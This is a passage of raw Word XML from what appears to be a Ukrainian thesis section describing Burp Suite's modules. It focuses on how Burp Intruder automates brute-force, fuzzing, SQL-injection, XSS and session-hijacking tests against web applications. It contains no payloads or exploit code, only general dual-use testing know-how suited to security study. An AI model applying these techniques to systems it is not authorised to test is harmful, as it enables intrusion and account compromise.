          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794D144" w14:textId="6B414881" w:rsidR="00C92CC5" w:rsidRPr="00C92CC5" w:rsidRDefault="00C92CC5" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Якщо подивитися статистику і репорти bug-bounty програм - практично скрізь на скріншотах можна зустріти використання цього інструменту. На ряду з OWASP ZAP це найпопулярніший набір утиліт для тестування веб-додатків.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797C72F" w14:textId="1784490A" w:rsidR="00C92CC5" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06920704" wp14:editId="08898592">
            <wp:extent cx="4587903" cy="2562904"/>
            <wp:effectExtent l="0" t="0" r="3175"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93864" cy="2566234"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE8B22" w14:textId="528BF7A4" w:rsidR="00877BAF" w:rsidRPr="005027FB" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA841AB" w14:textId="7DB2D371" w:rsidR="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Основний функціонал заснований на наступних модулях:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2E8EA" w14:textId="77777777" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Proxy - перехоплює проксі-сервер, що працює по протоколу HTTP (S) в режимі man-in-the-middle. Перебуваючи між браузером і веб-додатком він дозволить вам перехоплювати, вивчати і змінювати трафік йде в обох напрямках.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E0CDB" w14:textId="049DE7EC" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Spider - павук або краулер, що дозволяє вам в автоматичному режимі збирати інформацію про архітектуру веб-додатк</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ів</w:t>
      </w:r>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A802213" w14:textId="77777777" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Scanner - автоматичний сканер вразливостей (OWASP TOP 10 і т.д.) Можна користуватися в Professional версії, в безкоштовної версії тільки опис можливостей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7F7C3" w14:textId="77777777" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Intruder - утиліта, що дозволяє в автоматичному режимі проводити атаки різного виду, такі як підбір пароля, перебір ідентифікаторів, фаззінга і так далі.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8CAE9" w14:textId="77777777" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Repeater - утиліта для модифікування і повторної відправки окремих HTTP-запитів і аналізу відповідей додатки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ED02AA" w14:textId="78BC067C" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Sequencer - утиліта для аналізу генерації випадкових даних програми, виявлення алгоритму генерації, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">передбачуваності </w:t>
      </w:r>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C3289" w14:textId="0CACFB9B" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Decoder - утиліта для ручного або автоматичного перетворення даних веб-додатк</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B987F" w14:textId="77777777" w:rsidR="00376454" w:rsidRPr="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Comparer - утиліта для виявлення відмінностей в даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50667F2D" w14:textId="1EC69759" w:rsidR="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Extender - розширення в BurpSuite. Можна додавати як готові з BApp store, так і власної розробки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8E555" w14:textId="454BD8DE" w:rsidR="00376454" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Використання сукупності інструментів дозволяє найбільш глибоко і продуктивно досліджувати веб-додаток.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CBA614" w14:textId="2CBCC78D" w:rsidR="00376454" w:rsidRPr="005027FB" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Одна з основних утиліт для тестування це Burp Intruder. Принцип його роботи полягає в наступному: він обробляє кожен HTTP-запит (званий «базовим запитом»), змінюючи параметри різними способами, видаючи кожну змінену версію запиту і аналізуючи відповіді додатки для ідентифікації цікавих функцій або поведінки веб-додатки.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784AAF6" w14:textId="12383612" w:rsidR="00376454" w:rsidRPr="005027FB" w:rsidRDefault="00376454" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для кожної атаки існує можливість вказати набір корисних навантажень (пейлоадов) і їх позиції в базовому запиті. Доступні численні методи створення корисних навантажень (в тому числі прості списки рядків, чисел, дат, брутфорс</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і багато інших). Для аналізу результатів і виявлення цікавих питань для подальшого вивчення доступні різні інструменти.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81A001" w14:textId="5AA5B0FB" w:rsidR="006C4B4C" w:rsidRPr="004B547E" w:rsidRDefault="006C4B4C" w:rsidP="006C4B4C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Intruder </w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(рис. 2.6.8.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> володіє дуже гнучкою системою налаштувань, завдяки чому може бути використаний для автоматизації багатьох видів атак. Ви можете використовувати його і для виконання інших завдань, наприклад, підбору користувальницьких ідентифікаторів, збору важливої інформації або фаззінга.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E45F9D9" w14:textId="7EF7E5C8" w:rsidR="006C4B4C" w:rsidRDefault="006C4B4C" w:rsidP="006C4B4C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Типи можливих атак залежать від особливостей конкретного додатка і можуть включати: перевірку на наявність SQL-ін'єкцій, XSS, переповнення буфера, обхід директорії; bruteforce-атаки за різними схемами аутентифікації, перебір значень, маніпуляції з вмістом параметрів; пошук прихованого вмісту і функціоналу, обчислення ідентифікаторів сесій і їх перехоплення, збір даних, реалізація DoS-атак пов'язаних з особливостями веб-додатки.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737345A" w14:textId="77777777" w:rsidR="004B547E" w:rsidRPr="004B547E" w:rsidRDefault="004B547E" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B856513" w14:textId="6FEA69AB" w:rsidR="006C4B4C" w:rsidRDefault="006C4B4C" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C3665FF" wp14:editId="270DAF88">
            <wp:extent cx="5268162" cy="2955484"/>
            <wp:effectExtent l="0" t="0" r="889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1774" cy="2957510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C7EED" w14:textId="07A4C076" w:rsidR="006C4B4C" w:rsidRPr="006C4B4C" w:rsidRDefault="006C4B4C" w:rsidP="006C4B4C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07803037" w14:textId="1EEB787A" w:rsidR="006C4B4C" w:rsidRPr="006C4B4C" w:rsidRDefault="006C4B4C" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Burp Intruder містить (в Pro версії) безліч заздалегідь підібраних пейлоадов (рядків, що дозволяють виявити наявність вразливостей). Крім того, він містить велику кількість утиліт для динамічної генерації векторів атак, які підходять під конкретне застосування. Також в нього можуть бути завантажені додаткові пейлоди (наприклад імена користувачів або паролі), або специфічні фаззінга-запити.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4C507" w14:textId="503FE675" w:rsidR="006C4B4C" w:rsidRPr="004B547E" w:rsidRDefault="006C4B4C" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Основу роботи кожної атаки становить відсилання модифікованих HTTP-запитів. Їх вміст генерується на основі початкового запиту і встановленими пейлоад-позиціями </w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(рис. 2.6.8.</w:t>
